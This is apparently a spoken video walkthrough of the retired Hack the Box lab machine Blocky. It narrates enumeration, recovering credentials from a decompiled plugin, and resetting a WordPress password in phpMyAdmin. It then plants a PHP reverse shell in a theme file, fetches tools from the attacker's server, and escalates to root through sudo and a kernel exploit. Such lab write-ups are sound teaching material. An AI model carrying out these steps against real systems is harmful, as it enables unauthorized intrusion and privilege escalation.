In this video, we're going to go through another vulnerable machine from Hack the Box. And this machine is called Blocky, and it is a retired machine as of April 2018. So as we can see here in the retired machine section of Hack the Box, we see Blocky. And I owned this machine last night. And in this video, I'm actually going to show you two ways of how to do it. And I would say that the difficulty level was pretty easy. Okay, so without further ado, let's jump right into it. So we'll start with some basic enumeration, which is what I always do. So we'll start with a simple nmap. So we'll just say nmap minus sv 10.10.10.37, which is the IP of our target. And I'm also gonna open up my report, which is what I always do. So for every machine and for every vulnerability or cybersecurity assessment that I'm doing, I've gotten myself into the habit of writing extensive reports because I found that it is very helpful for me to review these reports at a later points, and also very helpful if I encounter a situation similar to the one that I am in at the moment, for example. So we'll leave this. So we'll just say nmap sv 10.10.10.37. And we have ports 21, 22, and 80 open. So we have a web server. We'll look into it in a moment. And we have 8192, which is closed. And after this basic nmap scan, so Control-Shift-C and paste the output, I usually do a more thorough scan on all ports and T5, which is a high level of aggressiveness, so 10.10.10.37, and this often reveals additional information that the simple scan wasn't able to provide. So Control-C, and I'm gonna paste this, Control-Shift-V into the terminal, enter, and we'll leave this in the background. Okay, so let's go and see what's the web server all about. So let's navigate to 10.10.10.37. Okay, so we might be dealing with a Minecraft server. Anything in the source of it? I actually didn't find anything interesting in the source of the home page. So I don't know, maybe I missed something, but I don't think so. So we'll leave this and we'll start with more enumeration. So we'll continue with more enumeration, and we'll just do a derb on HTTP 10.10.10.37 with big.txt. So user share word lists derb big.txt. So what's wrong? HTTP. Okay, so rookie mistake. Right, so this shouldn't take too long, but since we're dealing with a WordPress, so this looks like a WordPress, the next thing we should do is to start a WP scan. So while this is running, I'm also going to start a WP scan on the URL HTTP 10.10.10.37. Okay, let's say no for now. So the derb might actually take, like, I don't know, maybe 15-20 minutes, and it's gonna find a few directories and one of them, so it's going to find PHP Myadmin. It's going to find a common WordPress directories like WP content, plugins, and all that stuff. And it also is going to find a plugins directory, and we'll look into that in a minute. So the WP scan can lead us to a lot of rabbit holes. So at a quick look, there are a few potential like big security breaches in the version of this WordPress, but I didn't go into any of them because once I saw the output from derb, I tried to look into all the directories that appeared interesting. So but I also did I just wanted to see what are the users enumerate for this WordPress, because that's always helpful if you wanna, or if you try to log into WP admin. So let's say over here wp login.php. Okay, so it found a user notch, and this is a user that I added, so we don't take this into account. So it found a user notch. We could just write that down. So we could say derb with big.txt, wp scan, enumerate u, let's write it down correctly. Enumerate u found user notch. Save it. Okay. So while this is scanning, I'm actually going to go into the plugins directory, which was found by derb, and you're actually going to see it if the scan completes while this video is recording. So let's go to plugins, and we see two files over here, and I'm actually going to grab these two files, copy link location, and I'm going to download them, Control-Shift-V, the first one and the second one, so wget Control-Shift-V. Okay, so we have two of them over here. So we are dealing with Java jar files, and these are packed, so we could just unzip them. So unzip Blocky core and unzip grief blah blah blah. Replace, let's just say all. Okay, so the interesting information is in blockycar.jar, which unpacked into the com folder. So we'll just cd into com ls-a, cd my first plugin ls-a, and we're dealing with a class file. We could try to cat what's inside it, and we get this gibberish information, which doesn't look too appealing, but we can see over here username, welcome to Blocky, some string that might be a password. But if we really want to see the information inside that file, we're gonna decompile it using java p-c blocky core, and this one looks much better, so we can actually read it. And as you can see here, you have string localhost, string root, string. This might actually be a password. It says SQL pass, SQL pass. Let's try and see what we can do with this. Let's try and SSH. Since we have the 22 port open, let's try and SSH into the machine with these credentials. Would it really be that simple? So let's say SSH root at 10.10.10.37. It says root password, control shift V to paste it. And it doesn't work. Our derb, so our scan, is also going to find the Php Myadmin directory. So we have Php Myadmin and a couple of services running for the Minecraft server. And this is where I'm actually going to show you two ways to get into the machine. So the first one was navigating to Php Myadmin, so 10.10.10.37. So we also have, so it found another directory, JavaScript. We also have a FTP server as per our nmap. So we have FTP open, and we could try FTPing into 10.10.10.37 with the user root and the password control shift V. Login failed. Okay. But I didn't try that. I tried logging in with the root on Php Myadmin and the password, which I got from the Blocky core class. So control V, go. And this was one way to get into the database, and we can see all the tables over here. So let me just say found a lot of dirs with big.txt, 5 found credentials in class file and plugins. All right, save that. Credentials work in Php Myadmin as root. So the next thing that we want to do is to see how the users look like, because we could use the information from here to actually log in into the WordPress. Let me close that. Into the WordPress. We could try logging in with root and the password, this one that's on the clipboard, but we don't have a root user. So since we have full access to Php Myadmin as root, we could either create a new user, which I did over here. So I copied the notch into Jared, and the password over here is Jared. So if we try to log in with Jared, we can see that there's not much into it. So this is a very unprivileged user. So the next thing that we want to do is somehow modify the user pass in the notch for the notch user. So over here we could simply so this is the password field, and we could just, let's say, MD5 and say the password top notch, and modifying this in the database. And now we can, hopefully we can log in with notch and the password top notch. Okay, so we're in. So the very first thing that you want to do once you're inside is to try to somehow get access to the server, to the insides of the server with some sort of a reverse shell. But let's see what our derb found so far. So it found the JavaScript, the Php Myadmin, and the plugins. And it's also gonna find a wiki directory, which is another rabbit hole. So yeah. Okay, so we want to have some sort of reverse shell into the server. And I have one over here, which I'm not really sure where I got it from. And one thing that you can do to upload a reverse shell on the WordPress is to either install a new plugin. So you pack a shell, a PHP shell, into a zip file and you install it via the add new upload plugin and browse locally to your zip file. And I couldn't get that working. I'm not really sure why. But what I did was to edit the theme. So it's 2017 and let's say 404 template. And this is where I actually plugged in my shell. So I just, let's delete that and just leave pad into php rev.php. Control A to copy, Control V, and we'll just modify the IP and the port. So let's close this one. So let's see what's my IP. My IP is 10.10.14.14. Okay, so let's set up a listener to 4444. Interesting. So I'm already connected. Maybe I ran this one. I'm not sure. But let's get out of it. So let's nc -lvp 4443, and we're listening on port 4443. And we're modifying this to 4443 and the IP. So let's save it. I'm not really sure if this is gonna work. I may have to modify the IP over here to be in side quotes. But anyhow, so to execute this, we have to actually navigate to the location of that file. So 10.10.10.37, and it's in WP content. Themes 2017 and 404.php. So we have our listener and we try to execute this one, and it might not have worked. It didn't. So let's get back to over here and try to put the IP inside quotes. Okay, update. And now refresh this and we should be inside the server. Yeah, so we are inside the server as probably data. Okay, so since we want the user flag, the user is notch. So let's cd into home, ls -a notch, cd into notch. We can cd into notch, but we cannot read the user.txt. So cat user.txt, permission denied. So okay, let me just stop derbing. We have all the information here. We could just Control Shift C and paste it into our report over here. Control V, Control S to save. So we are inside the server. We cannot read the notch user.txt file, so we'd have to escalate our way into to notch. But what I did the first time was to actually escalate to root directly and not to notch. So let's try to escalate to notch first, which is, I guess it is the conventional way that this box was designed to be like owned. So since we have, remember that we have the credentials for so we have those credentials. I didn't actually paste the password from the Blocky jar file. ls-a cd com, my first plugin, java p -c, Blocky core. Control Shift C and paste it somewhere over here and make some more space. So we have that password, and once you're inside the server with no privileges, or with privileges as www data, you would actually want to do some enumeration. And to do enumeration, you would probably use a couple of files like linenum, linpriv, and exploit suggester. And what I do at this point is to actually set up a simple server with Python and take the files onto the machine. So let's cd into dev shm. We can create and execute files from here, because from what I know, they are deleted every time the machine restarts. And we'll set up a simple server. So I'm actually going to copy a few files from another machine, from another folder. So copy, let's say, lin enum sh into over here. So we have lin enum sh. I'm also gonna copy linpriv.py into over here, and I'm also gonna copy exploit suggester.sh into over here. And now I'm going to set up a Python simple HTTP server onto port 49, and I'm actually going to wget 10.10.14.14 port 49 linenum.sh wget 10.10.14.14 linpriv.py connection refused 10.10.14.14.39. So I forgot the port, linpriv.py, connection refused. It was port 49, 10.10.14.14. What a rookie. Linpriv.py. Okay, and the last one was the exploit suggester. So 10.10.14.14 port 49 expl sugsh. Okay, so we have these files, and we would change mode. I'm also having another file which is an exploit that I used, and I'm going to explain that in a minute. Chmod plus X to all of them so we can execute them. And right now what I would basically do is to start executing these and analyzing their output. But another thing that we can do, so we are in dev shm. We went in through var www html, I guess. Okay, so over here we have the wp config, which also holds credentials to the MySQL database, which is another way or another route for exploitation. So cat wp config php, and we have the username WordPress and this password. So we can just write that down. Let's say 7 wp config credentials. So username and password. Let's just copy the username, Control Shift C, Control V over here, Control Shift C, Control V over here, Control S to save, and try to log in locally to MySQL. So let's close this one too. Where were we? I guess over here. So let's say MySQL U WordPress, which is for user, and the password Control Shift V. So this is all in one big word. So you don't have to add a space after P to log into MySQL. Alright, so we are not inside a TTY shell, so we forgot to try to spawn a TTY shell. Let's try to go in again. We need to set up the listener. Okay, so Python -c import pty.spawn. So we're using the spawn method from the pty library, bin bash. Python not found. Which Python? It probably has Python 3. Let's try that. So import pty spawn bin bash. Alrighty, now let's cd into var cd into HTML, and now, so we don't actually have to go here to be able to get into the MySQL database. So WordPress -p Control-Shift-V, and we are inside the WordPress. So we can say show databases. This is show databases. This is basically kind of the same thing as going into the Php Myadmin, but we went into the Php Myadmin as root, and here we are as WordPress user, so I'm not really sure of the privileges we have for that. Anyhow, this would be another way of exploiting the machine. Let's get back into bash. Let's say -i. Okay, so you could, and if you run the, so we get into dev shm, if you run these enumeration tools, you'll be looking at different configuration files and try to use some of them as vectors to escalate your privileges to notch in this case, and then to root. But at this time, what I did is to try to use the credentials that I found into escalating into switching from data into notch. So if this was the password that we found in the class file. So we can we'll copy it and try to switch user to notch using that password, so Control-Shift-V. So we are notch right now. And to make it like, to cut it short, the first thing that I do when I'm as a user with a password that I have is to try to sudo -l to see if there is something that I could execute as root. But right now we could simply, if we want to have a better view of our terminal, we could simply SSH into notch 10.10.10.37 with the password provided, and we have a better view of it. And at this moment we can cat user.txt, and we have our user flag. So this is our user flag. Control-Shift-C. And here we could simply say that SSH into notch with the pass found in class file. And then the user flag is this one, Control-S. So back to what I was saying, what are the things that I can do with elevated privileges? Sudo -l, shift, so Control-Shift-V for the password. Oh, yeah. So Control-C, I actually pasted the user flag, Control-Shift-V. So user notch may run the following commands on Blocky. All. This is actually pretty simple. So let's say sudo ls root.txt, sudo cat root.txt, and we have the root flag over here. In real life, I don't think this is a very encountered situation. So we could say root flag is Control Shift or Control V, this one. If we want to get root, if we want to be root, we could say sudo, let me see if I can figure this out. Sudo bin bash -i. Yeah, so we are root. ID root. Okay, so we own this box, and that was one way to do it. Now let me exit this. Exit from here too, and get back to Notch over here. We're gonna exit from Notch as well. So we are dub data at this point, and we're gonna try another vector. So over here in dev.shm, I have an exploit which was released just recently, and I'm talking about this one. So this is a kernel exploit. I know that other kernel exploits might work for this kernel version, so uname -a for this 4.4.062, but I'm not really sure if they are stable in providing a good shell. But this one, this recent one, seems to be a good one. I don't think we have GCC to compile it. Is not currently installed. CC is not currently installed either. So what I did was to let me repeat that. So let me remove 44298. Okay. So let's get it. Copy link location, wget Control Shift V, and compile it locally on Kali. So I don't think it has any special instructions for compilation. It doesn't say anything here. So we'll just gcc 44298.c -o 44298. Okay, and it compiled. Now let's move it onto the box. So Python. Is the server still running? I guess it is. So we'll just wget 10.10.10.37 port. No, 14.14, which is my IP. 49 44298. All right. So we have it over here. Let's change mod +x 44298. And right now we'll execute this one. So we have spawned a TTI shell, and we'll just run this. 44298, invalid argument. What am I missing? Okay, so I kind of figured it out. So let's just set up the listener again and go in as the dub data. So we are inside the server. We're going to migrate to dev.shm. I'm not really sure why it didn't work previously, but anyway, so we have our compiled exploit here, and we have to spawn a TTI shell. So Python -c import pty spawn. We're going to spawn a bin bash. Okay, and change mode +x 44298, and now execute it 44298. So we got the root shell, but still I still didn't figure out why it didn't work the last time I tried it. So anyhow, we've been able to own this machine in two ways, and I would say that this one which actually gives you, so the kernel exploit one, which actually gives you the root, and it gives you a stable shell, is probably the quickest and the least dirty, I would say. Anyhow, I hope you enjoyed this video, and if you'd like to see more of these videos coming, please let me know in either of the comment sections below. Thank you for watching, and I'll see you in the next one.